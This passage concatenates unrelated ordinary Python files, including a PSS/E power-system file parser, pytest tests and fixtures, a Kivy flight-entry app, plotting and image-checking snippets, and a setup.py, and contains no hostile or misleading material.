"Channel Down (Strong)",
"Channel",
"Channel (Strong)",
"Double Top",
"Double Bottom",
"Multiple Top",
"Multiple Bottom",
"Head & Shoulders",
"Head & Shoulders Inverse",
],
"Gap": [
"Any",
"Up",
"Up 1%",
"Up 2%",
"Up 3%",
"Up 4%",
"Up 5%",
"Up 6%",
"Up 7%",
"Up 8%",
"Up 9%",
"Up 10%",
"Up 15%",
"Up 20%",
"Down",
"Down 1%",
"Down 2%",
"Down 3%",
"Down 4%",
"Down 5%",
"Down 6%",
"Down 7%",
"Down 8%",
"Down 9%",
"Down 10%",
"Down 15%",
"Down 20%",
],
"Change from Open": [
"Any",
"Up",
"Up 1%",
"Up 2%",
"Up 3%",
"Up 4%",
"Up 5%",
"Up 6%",
"Up 7%",
"Up 8%",
"Up 9%",
"Up 10%",
"Up 15%",
"Up 20%",
"Down",
"Down 1%",
"Down 2%",
"Down 3%",
"Down 4%",
"Down 5%",
"Down 6%",
"Down 7%",
"Down 8%",
"Down 9%",
"Down 10%",
"Down 15%",
"Down 20%",
],
"Candlestick": [
"Any",
"Long Lower Shadow",
"Long Upper Shadow",
"Hammer",
"Inverted Hammer",
"Spinning Top White",
"Spinning Top Black",
"Doji",
"Dragonfly Doji",
"Gravestone Doji",
"Marubozu White",
"Marubozu Black",
],
}
|
"""
Copyright (c) Microsoft Corporation.
Licensed under the MIT license.
"""
import pytest
from common.testexecresults import TestExecResults
from common.testresult import TestResults, TestResult
def test__ctor__test_results_not_correct_type__raises_type_error():
    """The TestExecResults constructor must reject anything that is not a TestResults instance."""
    with pytest.raises(TypeError):
        test_exec_result = TestExecResults("invalidtype")
def test__to_string__valid_test_results__creates_view_from_test_results_and_returns(mocker):
    """to_string() should build a notebook result, feed it to the results view, and return the rendered view."""
    # Arrange
    test_results = TestResults()
    test_results.append(TestResult("test1", True, 10, []))
    test_results.append(TestResult("test2", True, 10, []))
    test_exec_result = TestExecResults(test_results)
    # Stub get_ExecuteNotebookResult; a second instance supplies a realistic return value.
    mocker.patch.object(test_exec_result, 'get_ExecuteNotebookResult')
    notebook_result = TestExecResults(test_results).get_ExecuteNotebookResult("", test_results)
    test_exec_result.get_ExecuteNotebookResult.return_value = notebook_result
    # Stub the view so we can assert on the interactions and control the output.
    mocker.patch.object(test_exec_result.runcommand_results_view, 'add_exec_result')
    mocker.patch.object(test_exec_result.runcommand_results_view, 'get_view')
    test_exec_result.runcommand_results_view.get_view.return_value = "expectedview"
    # Act
    view = test_exec_result.to_string()
    # Assert: result flows into the view exactly once and the view output is returned.
    test_exec_result.get_ExecuteNotebookResult.assert_called_once_with("", test_results)
    test_exec_result.runcommand_results_view.add_exec_result.assert_called_once_with(notebook_result)
    test_exec_result.runcommand_results_view.get_view.assert_called_once_with()
    assert view == "expectedview"
def test__to_string__valid_test_results_run_from_notebook__creates_view_from_test_results_and_returns(mocker):
    """Unmocked end-to-end check: the rendered view mentions the section header and both test names."""
    # Arrange
    test_results = TestResults()
    test_results.append(TestResult("test1", True, 10, []))
    test_results.append(TestResult("test2", True, 10, []))
    test_exec_result = TestExecResults(test_results)
    # Act
    view = test_exec_result.to_string()
    # Assert: both tests passed, so they appear under the passing section.
    assert "PASSING TESTS" in view
    assert "test1" in view
    assert "test2" in view
def test__exit__valid_test_results__serializes_test_results_and_passes_to_dbutils_exit(mocker):
    """exit() must serialize the results and hand the payload to dbutils.notebook.exit()."""
    # Arrange
    test_results = TestResults()
    test_results.append(TestResult("test1", True, 10, []))
    test_results.append(TestResult("test2", True, 10, []))
    test_exec_result = TestExecResults(test_results)
    mocker.patch.object(test_results, 'serialize')
    serialized_data = "serializeddata"
    test_results.serialize.return_value = serialized_data
    dbutils_stub = DbUtilsStub()
    # Act
    test_exec_result.exit(dbutils_stub)
    # Assert
    test_results.serialize.assert_called_with()
    # Idiom fix: avoid `assert True == x` (flake8 E712); assert truthiness directly.
    assert dbutils_stub.notebook.exit_called
    assert dbutils_stub.notebook.data_passed == serialized_data
class DbUtilsStub:
    """Minimal stand-in for the Databricks `dbutils` object, exposing only `.notebook`."""
    def __init__(self):
        # The tests inspect notebook.exit_called / notebook.data_passed afterwards.
        self.notebook = NotebookStub()
class NotebookStub():
    """Records calls to exit() instead of terminating a notebook."""
    def __init__(self):
        # Flags inspected by the tests after exercising exit().
        self.exit_called = False
        self.data_passed = ""
    def exit(self, data):
        """Remember that an exit was requested and capture its payload."""
        self.exit_called, self.data_passed = True, data
from numpy import cos, sin, sqrt, linspace as lsp, arange, reciprocal as rp
from matplotlib.pyplot import plot, polar, title, show
from math import pi as π
# NOTE(review): `sin` and `arange` are imported but never used below.
##Polar square... and byenary 100 all!
# Numeral gimmick: 0b100 == 4, 0b10 == 2, 0o10 == 8, 0x10 == 16.
# θ spans [0, π/4] with 2 samples; ρ = π/8 is a fixed angular offset.
θ, ρ = lsp(0, π/0b100, 0b10), π/0o10 # ... or for octoplus!
r = rp(cos(θ))  # 1/cos(θ) == sec(θ): polar form of a straight (vertical) line segment
# Draw the segment (and its mirrored copy) rotated by π/2 on each of 4 passes,
# producing the four edges of a square in polar coordinates.
for θ in (θ + n*π/0b10 for n in range(4)):
    _ = polar(θ + ρ, r, θ + (π/0b100 + ρ), r[::-1])
_ = title('Polar square'), show()
#Polygon circle...
# 16 sample points for x in [0, sqrt(2)/2] (one octant of the unit circle).
x = lsp(0, sqrt(0b10)/0b10, 0x10) # Hexadecaphilia!
y = sqrt(1 - x**0b10)  # unit circle: y = sqrt(1 - x^2)
# Mirror the octant into all four quadrants; plotting both (x, y) and (y, x)
# covers the two octants of each quadrant.
for x, y in ((x, y), (x, -y), (-x, -y), (-x, y)):
    _ = plot(x, y, y, x)
_ = title('Polygon circle'), show()
### https://en.wikipedia.org/wiki/Parametric_equation#Some_sophisticated_functions
"""PSS/E file parser"""
import re
from ..consts import deg2rad
from ..utils.math import to_number
import logging
logger = logging.getLogger(__name__)
def testlines(fid):
"""Check the raw file for frequency base"""
first = fid.readline()
first = first.strip().split('/')
first = first[0].split(',')
if float(first[5]) == 50.0 or float(first[5]) == 60.0:
return True
else:
return False
def read(file, system):
    """Read a PSS/E RAW file (v32/v33 format) and add its devices to *system*.

    Parses the file into per-block record lists, then converts the bus,
    load, fixed-shunt, generator, branch, transformer, switched-shunt,
    area and zone records into system elements. Returns True.

    Fixes: the version-sniffing regex is now a raw string (``'\\d'`` in a
    plain string is an invalid escape in modern Python), and the file is
    opened with a context manager so the handle is closed even if parsing
    raises.
    """
    # Data block names in the order they appear in a v32 RAW file.
    blocks = [
        'bus', 'load', 'fshunt', 'gen', 'branch', 'transf', 'area',
        'twotermdc', 'vscdc', 'impedcorr', 'mtdc', 'msline', 'zone',
        'interarea', 'owner', 'facts', 'swshunt', 'gne', 'Q'
    ]
    # Number of consecutive lines forming one record of each block
    # (two-winding transformers span 4 lines).
    nol = [1, 1, 1, 1, 1, 4, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0]
    rawd = re.compile(r'rawd\d\d')  # e.g. matches "rawd32" in the title line
    retval = True
    version = 0
    b = 0  # current block index
    raw = {}
    for item in blocks:
        raw[item] = []
    data = []
    mdata = []  # multi-line data
    mline = 0  # line counter for multi-line models
    # parse file into raw with to_number conversions
    with open(file, 'r') as fid:
        for num, line in enumerate(fid.readlines()):
            line = line.strip()
            if num == 0:  # get basemva and frequency
                data = line.split('/')[0]
                data = data.split(',')
                mva = float(data[1])
                system.config.mva = mva
                system.config.freq = float(data[5])
                version = int(data[2])
                if not version:
                    # Fall back to sniffing "rawdNN" from the title line.
                    version = int(rawd.search(line).group(0).strip('rawd'))
                if version < 32 or version > 33:
                    logger.warning(
                        'RAW file version is not 32 or 33. Error may occur.')
                continue
            elif num == 1:  # store the case info line
                logger.info(line)
                continue
            elif num == 2:
                continue
            elif num >= 3:
                if line[0:2] == '0 ' or line[0:3] == ' 0 ':  # end of block
                    b += 1
                    continue
                elif line[0] == 'Q':  # end of file
                    break
                data = line.split(',')
                data = [to_number(item) for item in data]
                mdata.append(data)
                mline += 1
                if mline >= nol[b]:
                    # Record complete: single-line records are unwrapped.
                    if nol[b] == 1:
                        mdata = mdata[0]
                    raw[blocks[b]].append(mdata)
                    mdata = []
                    mline = 0
    # add device elements to system
    sw = {}  # idx:a0 -- initial angle of each swing (type 3) bus
    for data in raw['bus']:
        """version 32:
        0, 1, 2, 3, 4, 5, 6, 7, 8
        ID, NAME, BasekV, Type, Area Zone Owner Va, Vm
        """
        idx = data[0]
        ty = data[3]
        a0 = data[8] * deg2rad
        if ty == 3:
            sw[idx] = a0
        param = {
            'idx': idx,
            'name': data[1],
            'Vn': data[2],
            'voltage': data[7],
            'angle': a0,
            'area': data[4],
            'zone': data[5],
            'owner': data[6],
        }
        system.Bus.elem_add(**param)
    for data in raw['load']:
        """version 32:
        0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11
        Bus, Id, Status, Area, Zone, PL(MW), QL (MW), IP, IQ, YP, YQ, OWNER
        """
        bus = data[0]
        vn = system.Bus.get_field('Vn', bus)
        voltage = system.Bus.get_field('voltage', bus)
        # Collapse constant-P, constant-I and constant-Y components into one
        # per-unit PQ load at the current bus voltage.
        param = {
            'bus': bus,
            'Vn': vn,
            'Sn': mva,
            'p': (data[5] + data[7] * voltage + data[9] * voltage**2) / mva,
            'q': (data[6] + data[8] * voltage - data[10] * voltage**2) / mva,
            'owner': data[11],
        }
        system.PQ.elem_add(**param)
    for data in raw['fshunt']:
        """
        0, 1, 2, 3, 4
        Bus, name, Status, g (MW), b (Mvar)
        """
        bus = data[0]
        vn = system.Bus.get_field('Vn', bus)
        param = {
            'bus': bus,
            'Vn': vn,
            'u': data[2],
            'Sn': mva,
            'g': data[3] / mva,
            'b': data[4] / mva,
        }
        system.Shunt.elem_add(**param)
    gen_idx = 0
    for data in raw['gen']:
        """
        0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11, 12, 13, 14, 15, 16,17,18,19
        I,ID,PG,QG,QT,QB,VS,IREG,MBASE,ZR,ZX,RT,XT,GTAP,STAT,RMPCT,PT,PB,O1,F1
        """
        bus = data[0]
        vn = system.Bus.get_field('Vn', bus)
        gen_mva = data[8]  # unused yet
        gen_idx += 1
        status = data[14]
        param = {
            'Sn': gen_mva,
            'Vn': vn,
            'u': status,
            'idx': gen_idx,
            'bus': bus,
            'pg': status * data[2] / mva,
            'qg': status * data[3] / mva,
            'qmax': data[4] / mva,
            'qmin': data[5] / mva,
            'v0': data[6],
            'ra': data[9],  # ra armature resistance
            'xs': data[10],  # xs synchronous reactance
            'pmax': data[16] / mva,
            'pmin': data[17] / mva,
        }
        # Generators on a swing bus become SW elements (with initial angle);
        # all others become PV elements.
        if data[0] in sw.keys():
            param.update({
                'a0': sw[data[0]],
            })
            system.SW.elem_add(**param)
        else:
            system.PV.elem_add(**param)
    for data in raw['branch']:
        """
        I,J,CKT,R,X,B,RATEA,RATEB,RATEC,GI,BI,GJ,BJ,ST,LEN,O1,F1,...,O4,F4
        """
        param = {
            'bus1': data[0],
            'bus2': data[1],
            'r': data[3],
            'x': data[4],
            'b': data[5],
            'rate_a': data[6],
            'Vn': system.Bus.get_field('Vn', data[0]),
            'Vn2': system.Bus.get_field('Vn', data[1]),
        }
        system.Line.elem_add(**param)
    for data in raw['transf']:
        """
        I,J,K,CKT,CW,CZ,CM,MAG1,MAG2,NMETR,'NAME',STAT,O1,F1,...,O4,F4
        R1-2,X1-2,SBASE1-2
        WINDV1,NOMV1,ANG1,RATA1,RATB1,RATC1,COD1,CONT1,RMA1,RMI1,VMA1,VMI1,NTP1,TAB1,CR1,CX1
        WINDV2,NOMV2
        """
        # A two-winding transformer record has a short second line
        # (R1-2, X1-2, SBASE1-2); three-winding records are longer.
        if len(data[1]) < 5:
            ty = 2
        else:
            ty = 3
        if ty == 3:
            raise NotImplementedError(
                'Three-winding transformer not implemented')
        tap = data[2][0]
        phi = data[2][2]
        # Unity tap with zero phase shift behaves like a plain line.
        if tap == 1 and phi == 0:
            trasf = False
        else:
            trasf = True
        param = {
            'trasf': trasf,
            'bus1': data[0][0],
            'bus2': data[0][1],
            'u': data[0][11],
            'b': data[0][8],
            'r': data[1][0],
            'x': data[1][1],
            'tap': tap,
            'phi': phi,
            'rate_a': data[2][3],
            'Vn': system.Bus.get_field('Vn', data[0][0]),
            'Vn2': system.Bus.get_field('Vn', data[0][1]),
        }
        system.Line.elem_add(**param)
    for data in raw['swshunt']:
        # I, MODSW, ADJM, STAT, VSWHI, VSWLO, SWREM, RMPCT, ’RMIDNT’,
        # BINIT, N1, B1, N2, B2, ... N8, B8
        bus = data[0]
        vn = system.Bus.get_field('Vn', bus)
        param = {
            'bus': bus,
            'Vn': vn,
            'Sn': mva,
            'u': data[3],
            'b': data[9] / mva,  # only BINIT is used; the switching blocks are ignored
        }
        system.Shunt.elem_add(**param)
    for data in raw['area']:
        """ID, ISW, PDES, PTOL, ARNAME"""
        param = {
            'idx': data[0],
            'isw': data[1],
            'pdes': data[2],
            'ptol': data[3],
            'name': data[4],
        }
        system.Area.elem_add(**param)
    for data in raw['zone']:
        """ID, NAME"""
        param = {
            'idx': data[0],
            'name': data[1],
        }
        system.Zone.elem_add(**param)
    return retval
def readadd(file, system):
    """Read a PSS/E DYR (dynamic data) file and add the models to *system*.

    Records are accumulated until a '/' terminator is seen, grouped by the
    model name (field 1 of each record), then dispatched through add_dyn().
    Unsupported model types are reported once at the end. Returns True.

    Fixes: the file handle is now closed via a context manager even if
    parsing raises, membership tests use ``in dyr`` instead of
    ``in dyr.keys()``, and the "unsupported models" warning is only logged
    when there actually are unsupported models.
    """
    dyr = {}       # model name -> list of parameter records
    data = []      # fields of the record being accumulated
    end = 0        # set to 1 once the '/' record terminator is seen
    retval = True
    sep = ','
    with open(file, 'r') as fid:
        for line in fid.readlines():
            if line.find('/') >= 0:
                # '/' terminates a record; anything after it is a comment.
                line = line.split('/')[0]
                end = 1
            if line.find(',') >= 0:  # mixed comma and space splitter not allowed
                line = [to_number(item.strip()) for item in line.split(sep)]
            else:
                line = [to_number(item.strip()) for item in line.split()]
            if not line:
                end = 0
                continue
            data.extend(line)
            if end == 1:
                # Record complete: file it under its model name (field 1).
                field = data[1]
                if field not in dyr:
                    dyr[field] = []
                dyr[field].append(data)
                end = 0
                data = []
    # elem_add device elements to system
    supported = [
        'GENROU',
        'GENCLS',
        'ESST3A',
        'ESDC2A',
        'SEXS',
        'EXST1',
        'ST2CUT',
        'IEEEST',
        'TGOV1',
    ]
    used = list(supported)
    for model in supported:
        if model not in dyr:
            used.remove(model)
            continue
        for data in dyr[model]:
            add_dyn(system, model, data)
    # Anything present in the file but not in `supported` is reported.
    needed = list(dyr.keys())
    for i in supported:
        if i in needed:
            needed.remove(i)
    if needed:
        logger.warning('Models currently unsupported: {}'.format(
            ', '.join(needed)))
    return retval
def add_dyn(system, model, data):
    """helper function to elem_add a device element to system

    Dispatches on the PSS/E dynamic model name *model* and maps the flat
    DYR record *data* onto the parameters of the corresponding system
    model. ``data[0]`` is the bus number; ``data[3:]`` strips the three
    leading identification fields (bus, model name, machine id --
    presumably; confirm against the DYR format). Raises KeyError when a
    generator model references a bus with no static generator.
    """
    if model == 'GENCLS':
        # Classical (constant-voltage-behind-reactance) generator -> Syn2.
        bus = data[0]
        data = data[3:]
        if bus in system.PV.bus:
            dev = 'PV'
            gen_idx = system.PV.idx[system.PV.bus.index(bus)]
        elif bus in system.SW.bus:
            dev = 'SW'
            gen_idx = system.SW.idx[system.SW.bus.index(bus)]
        else:
            raise KeyError
        # todo: check xl
        idx_PV = get_idx(system, 'StaticGen', 'bus', bus)
        u = get_param(system, 'StaticGen', 'u', idx_PV)
        param = {
            'bus': bus,
            'gen': gen_idx,
            # 'idx': bus,
            # use `bus` for `idx`. Only one generator allowed on each bus
            'Sn': system.__dict__[dev].get_field('Sn', gen_idx),
            'Vn': system.__dict__[dev].get_field('Vn', gen_idx),
            'xd1': system.__dict__[dev].get_field('xs', gen_idx),
            'ra': system.__dict__[dev].get_field('ra', gen_idx),
            'M': 2 * data[0],  # M = 2H (inertia constant from the DYR record)
            'D': data[1],
            'u': u,
        }
        system.Syn2.elem_add(**param)
    elif model == 'GENROU':
        # Round-rotor generator -> 6th-order Syn6a.
        bus = data[0]
        data = data[3:]
        if bus in system.PV.bus:
            dev = 'PV'
            gen_idx = system.PV.idx[system.PV.bus.index(bus)]
        elif bus in system.SW.bus:
            dev = 'SW'
            gen_idx = system.SW.idx[system.SW.bus.index(bus)]
        else:
            raise KeyError
        idx_PV = get_idx(system, 'StaticGen', 'bus', bus)
        u = get_param(system, 'StaticGen', 'u', idx_PV)
        param = {
            'bus': bus,
            'gen': gen_idx,
            # 'idx': bus,
            # use `bus` for `idx`. Only one generator allowed on each bus
            'Sn': system.__dict__[dev].get_field('Sn', gen_idx),
            'Vn': system.__dict__[dev].get_field('Vn', gen_idx),
            'ra': system.__dict__[dev].get_field('ra', gen_idx),
            'Td10': data[0],
            'Td20': data[1],
            'Tq10': data[2],
            'Tq20': data[3],
            'M': 2 * data[4],  # M = 2H
            'D': data[5],
            'xd': data[6],
            'xq': data[7],
            'xd1': data[8],
            'xq1': data[9],
            'xd2': data[10],
            'xq2': data[10],  # xd2 = xq2
            'xl': data[11],
            'u': u,
        }
        system.Syn6a.elem_add(**param)
    elif model == 'ESST3A':
        # Static excitation system, mapped approximately onto AVR1 --
        # NOTE(review): confirm the index mapping against the ESST3A sheet.
        bus = data[0]
        data = data[3:]
        syn = get_idx(system, 'Synchronous', 'bus', bus)
        param = {
            'syn': syn,
            'vrmax': data[8],
            'vrmin': data[9],
            'Ka': data[6],
            'Ta': data[7],
            'Tf': data[5],
            'Tr': data[0],
            'Kf': data[5],
            'Ke': 1,
            'Te': 1,
        }
        system.AVR1.elem_add(**param)
    elif model == 'ESDC2A':
        # DC exciter model -> AVR1.
        bus = data[0]
        data = data[3:]
        syn = get_idx(system, 'Synchronous', 'bus', bus)
        param = {
            'syn': syn,
            'vrmax': data[5],
            'vrmin': data[6],
            'Ka': data[1],
            'Ta': data[2],
            'Tf': data[10],
            'Tr': data[0],
            'Kf': data[9],
            'Ke': 1,
            'Te': data[8],
        }
        system.AVR1.elem_add(**param)
    elif model == 'EXST1':
        # Static exciter -> AVR1.
        bus = data[0]
        data = data[3:]
        syn = get_idx(system, 'Synchronous', 'bus', bus)
        param = {
            'syn': syn,
            'vrmax': data[7],
            'vrmin': data[8],
            'Ka': data[5],
            'Ta': data[6],
            'Kf': data[10],
            'Tf': data[11],
            'Tr': data[0],
            'Te': data[4],
        }
        system.AVR1.elem_add(**param)
    elif model == 'SEXS':
        # Simplified excitation system -> AVR3.
        bus = data[0]
        data = data[3:]
        syn = get_idx(system, 'Synchronous', 'bus', bus)
        param = {
            'syn': syn,
            'vrmax': data[5],
            'vrmin': data[4],
            'K0': data[2],
            'T2': data[1],
            'T1': data[0],
            'Te': data[3],
        }
        system.AVR3.elem_add(**param)
    elif model == 'IEEEG1':
        # TODO: IEEEG1 governor not implemented yet; record is parsed but dropped.
        bus = data[0]
        data = data[3:]
        syn = get_idx(system, 'Synchronous', 'bus', bus)
        pass
    elif model == 'TGOV1':
        # Steam turbine governor -> TG2.
        bus = data[0]
        data = data[3:]
        syn = get_idx(system, 'Synchronous', 'bus', bus)
        param = {
            'gen': syn,
            'R': data[0],
            'T1': data[4],
            'T2': data[5],
        }
        system.TG2.elem_add(**param)
    elif model == 'ST2CUT':
        # Dual-input stabilizer -> PSS1; attached to the AVR of the machine on `bus`.
        bus = data[0]
        data = data[3:]
        Ic1 = data[0]
        Ic2 = data[2]
        data = data[4:]
        syn = get_idx(system, 'Synchronous', 'bus', bus)
        avr = get_idx(system, 'AVR', 'syn', syn)
        param = {
            'avr': avr,
            'Ic1': Ic1,
            'Ic2': Ic2,
            'K1': data[0],
            'K2': data[1],
            'T1': data[2],
            'T2': data[3],
            'T3': data[4],
            'T4': data[5],
            'T5': data[6],
            'T6': data[7],
            'T7': data[8],
            'T8': data[9],
            'T9': data[10],
            'T10': data[11],
            'lsmax': data[12],
            'lsmin': data[13],
            'vcu': data[14],
            'vcl': data[15],
        }
        system.PSS1.elem_add(**param)
    elif model == 'IEEEST':
        # IEEE stabilizer -> PSS2; attached to the AVR of the machine on `bus`.
        bus = data[0]
        data = data[3:]
        Ic = data[0]
        data = data[2:]
        syn = get_idx(system, 'Synchronous', 'bus', bus)
        avr = get_idx(system, 'AVR', 'syn', syn)
        param = {
            'avr': avr,
            'Ic': Ic,
            'A1': data[0],
            'A2': data[1],
            'A3': data[2],
            'A4': data[3],
            'A5': data[4],
            'A6': data[5],
            'T1': data[6],
            'T2': data[7],
            'T3': data[8],
            'T4': data[9],
            'T5': data[10],
            'T6': data[11],
            'Ks': data[12],
            'lsmax': data[13],
            'lsmin': data[14],
            'vcu': data[15],
            'vcl': data[16],
        }
        system.PSS2.elem_add(**param)
    else:
        logger.warning('Skipping unsupported model <{}> on bus {}'.format(
            model, data[0]))
def get_idx(system, group, param, fkey):
    """Return the idx (name) of the first device in *group* whose *param* equals *fkey*.

    Returns None when the group is unknown or no device matches.
    """
    members = system.devman.group.get(group, {})
    for name, dev in members.items():
        model = system.__dict__[dev]
        if model.__dict__[param][model.uid[name]] == fkey:
            return name
    return None
def get_param(system, group, param, fkey):
    """Return the value of *param* for the device named *fkey* in *group*.

    Returns None when the group is unknown or no device carries that name.
    """
    ret = None
    members = system.devman.group.get(group, {})
    for name, dev in members.items():
        if name == fkey:
            model = system.__dict__[dev]
            ret = model.__dict__[param][model.uid[name]]
    return ret
|
from typing import Union
from pathlib import Path
from PIL import Image
def verifyTruncated(path: Union[str, Path]) -> bool:
    """Return True if the file at *path* opens as a valid, identifiable image.

    Uses PIL's ``Image.verify()``, which raises for truncated/corrupt files.
    Returns False when the file cannot be read or identified, or when PIL
    reports no format.

    Fix: ``except (IOError, OSError)`` was redundant -- IOError has been an
    alias of OSError since Python 3.3 -- so only OSError is caught (PIL's
    UnidentifiedImageError is an OSError subclass).
    """
    try:
        with Image.open(path) as image:
            image.verify()
            # A None format would mean PIL could not identify the file type.
            return image.format is not None
    except OSError:
        return False
|
import os
import flask
# Load .env first, then force an in-memory SQLite database BEFORE importing
# offstream -- the engine is presumably created at import time from
# DATABASE_URL (confirm against offstream.db).
flask.cli.load_dotenv()
os.environ["DATABASE_URL"] = "sqlite:///:memory:"
import pytest
from offstream import db
from offstream.app import app
@pytest.fixture
def setup_db():
    """Create all tables before the test and drop them afterwards."""
    db.Base.metadata.create_all(db.engine)
    yield
    db.Base.metadata.drop_all(db.engine)
@pytest.fixture
def session():
    """Yield a database session that is closed when the test ends."""
    with db.Session() as session:
        yield session
@pytest.fixture
def client(setup_db):
    """Flask test client running against a freshly created schema."""
    app.testing = True
    with app.test_client() as client:
        yield client
@pytest.fixture
def runner(setup_db):
    """CLI runner for the app's commands (schema created first via setup_db)."""
    return app.test_cli_runner()
@pytest.fixture
def settings(session):
    """Persist a settings row; returns (settings, password).

    db.settings() presumably generates the password and returns it alongside
    the model instance -- confirm against offstream.db.
    """
    settings, password = db.settings(ping_url="https://example.org/")
    session.add(settings)
    session.commit()
    return settings, password
@pytest.fixture
def auth(settings):
    """(username, password) pair usable for basic-auth requests."""
    settings_, password = settings
    return settings_.username, password
@pytest.fixture
def streamer(session, setup_db):
    """A committed Streamer row named "x"."""
    streamer_ = db.Streamer(name="x")
    session.add(streamer_)
    session.commit()
    return streamer_
@pytest.fixture
def stream(streamer, session):
    """A committed Stream row attached to the `streamer` fixture."""
    stream_ = db.Stream(url="https://example.org/", streamer=streamer)
    session.add(stream_)
    session.commit()
    return stream_
@pytest.fixture(params=[None, ("offstream", ""), ("offstream", "wrong")])
def bad_auth(request):
    """Invalid credential variants: missing, empty password, wrong password."""
    return request.param
@pytest.fixture
def m3u8(tmpdir):
    """Path to a (not yet created) playlist file inside a temp directory."""
    return tmpdir / "playlist.m3u8"
|
from .convert import Converter
from .register import register
# Public API re-exported at package level.
__all__ = [
    'Converter',
    'register'
]
|
import json
import os
from kivy.app import App
from kivy.config import Config
from kivy.uix.gridlayout import GridLayout
from kivy.uix.label import Label
from kivy.uix.textinput import TextInput
from kivy.uix.togglebutton import ToggleButton
from kivy.uix.button import Button
class planeFinder(App):
    """Kivy app: a two-column form that appends flights to JSON databases.

    Arrivals are stored in static/arrivals.json and departures in
    static/departures.json, both relative to the current working directory.

    Bug fix: the departure branch previously dumped ``self.arrivals`` into
    departures.json, silently corrupting the departures database.
    """

    def build(self):
        """Create and return the root widget (a 2-column grid form)."""
        self.title = 'Plane Finder'  # window title
        grid = GridLayout(cols=2)  # 2-column grid layout
        self.ROOT = os.path.abspath(os.getcwd())  # directory holding static/*.json
        # Widgets: flight-type toggles, text fields, submit button, status label.
        # (The unused `id=` kwargs were dropped; the `id` widget property is
        # deprecated/removed in recent Kivy releases.)
        self.arrival = ToggleButton(text='Arrival', group='type', state='down')
        self.departure = ToggleButton(text='Departure', group='type')
        self.flight = TextInput(multiline=False)
        self.carrier = TextInput(multiline=False)
        self.destination = TextInput(multiline=False)
        self.time = TextInput(multiline=False)
        self.codeshare = TextInput(multiline=False)
        self.button = Button(text='Enter')
        self.button.bind(on_press=self.addFlight)
        self.confirm = Label(text='[color=90EE90]Enter a flight to be added to the database[/color]', markup=True)
        # Lay the widgets out on the grid.
        grid.add_widget(self.arrival)
        grid.add_widget(self.departure)
        grid.add_widget(Label(text='Flight'))
        grid.add_widget(self.flight)
        grid.add_widget(Label(text='Carrier'))
        grid.add_widget(self.carrier)
        grid.add_widget(Label(text='Destination'))
        grid.add_widget(self.destination)
        grid.add_widget(Label(text='Departure/arrival time'))
        grid.add_widget(self.time)
        grid.add_widget(Label(text='Codeshare'))
        grid.add_widget(self.codeshare)
        grid.add_widget(self.confirm)
        grid.add_widget(self.button)
        return grid

    def addFlight(self, *kwargs):
        """Collect the form fields and append the flight to the proper database."""
        self.departures = self.openDepartures()
        self.arrivals = self.openArrivals()
        newFlight = {
            'Flight': self.flight.text,
            'Carrier': self.carrier.text,
            'Destination': self.destination.text,
            'Codeshare': self.codeshare.text,
        }
        # The toggle buttons decide which database receives the record.
        if self.arrival.state == 'down':
            newFlight['Arrival Time'] = self.time.text
            self.arrivals.append(newFlight)
            self._saveDatabase('static/arrivals.json', self.arrivals)
        else:
            newFlight['Departure Time'] = self.time.text
            self.departures.append(newFlight)
            # BUG FIX: was json.dump(self.arrivals, ...) here.
            self._saveDatabase('static/departures.json', self.departures)

    def _saveDatabase(self, relpath, flights):
        """Write *flights* to *relpath*; report the outcome on the status label."""
        try:
            with open(os.path.join(self.ROOT, relpath), 'w') as db_file:
                json.dump(flights, db_file, indent=4)
            self.confirm.text = '[color=90EE90]Flight added to the database[/color]'
            self.eraseAll()  # clear the form after a successful save
        except Exception:  # was a bare except; keep best-effort but don't trap SystemExit
            self.confirm.text = '[color=f44336]Error while saving database[/color]'

    def eraseAll(self):
        """Clear all text fields (used after a successful save)."""
        self.flight.text = ''
        self.carrier.text = ''
        self.destination.text = ''
        self.time.text = ''
        self.codeshare.text = ''

    def _openDatabase(self, relpath):
        """Load a JSON flight list; return [] when the file is missing or corrupt."""
        try:
            with open(os.path.join(self.ROOT, relpath), 'r') as db_file:
                return json.load(db_file)
        except Exception:
            print('[ERROR] Failed loading database.')
            return []

    def openDepartures(self):
        """Load the departures database."""
        return self._openDatabase('static/departures.json')

    def openArrivals(self):
        """Load the arrivals database."""
        return self._openDatabase('static/arrivals.json')
# Fix the window size, then launch the application.
Config.set('graphics', 'width', 550)
Config.set('graphics', 'height', 300)
planeFinder().run()  # start the program
|
from __future__ import print_function, absolute_import
class MiddlewareMixin(object):
    """Compatibility shim mirroring django.utils.deprecation.MiddlewareMixin.

    Fix: the *get_response* callable was accepted but silently discarded;
    Django's MiddlewareMixin stores it for use by __call__, so it is now
    kept on the instance (backward-compatible -- only adds an attribute).
    """
    def __init__(self, get_response=None):
        super(MiddlewareMixin, self).__init__()
        self.get_response = get_response
|
# -*- coding: utf-8 -*-
import os
import codecs
from setuptools import setup
# Read the long description from README.txt next to this file.
# codecs.open (rather than the builtin open) keeps an explicit encoding on
# Python 2.7, which the classifiers below declare as supported.
here = os.path.abspath(os.path.dirname(__file__))
readme_path = os.path.join(here, 'README.txt')
with codecs.open(readme_path, 'r', encoding='utf-8') as file:
    readme = file.read()
setup(
    name='circus-env-modifier',
    version='0.1.1',
    description=(
        "Mozilla Circus hook for modifying environment with an external"
        " command."
    ),
    long_description=readme,
    classifiers=[
        'Environment :: Plugins',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Intended Audience :: System Administrators',
        'Operating System :: OS Independent',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'License :: OSI Approved :: Apache Software License',
    ],
    author='Mikołaj Siedlarek',
    author_email='msiedlarek@nctz.net',
    url='https://github.com/msiedlarek/circus-env-modifier',
    keywords='mozilla circus hook environment env script command',
    packages=['circus_env_modifier']
)
|
from keras.preprocessing.sequence import pad_sequences
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics import classification_report
from sklearn.model_selection import train_test_split
import train
import predict
from config import Config
import preprocessing as prep
import numpy as np
def run():
    """Train on data/xtrain+ytrain, report validation metrics, then label data/xtest."""
    config = Config()
    save_path = "trained_model/saved_model"
    x_train_path = 'data/xtrain.txt'
    y_train_path = 'data/ytrain.txt'
    x_idx = prep.Indexer()
    X = prep.read_file(x_train_path, raw=True)
    y = prep.read_file(y_train_path, label=True)
    # Character n-gram tokenization: inverse_transform(fit_transform(...))
    # recovers each document's n-gram tokens, which the Indexer maps to
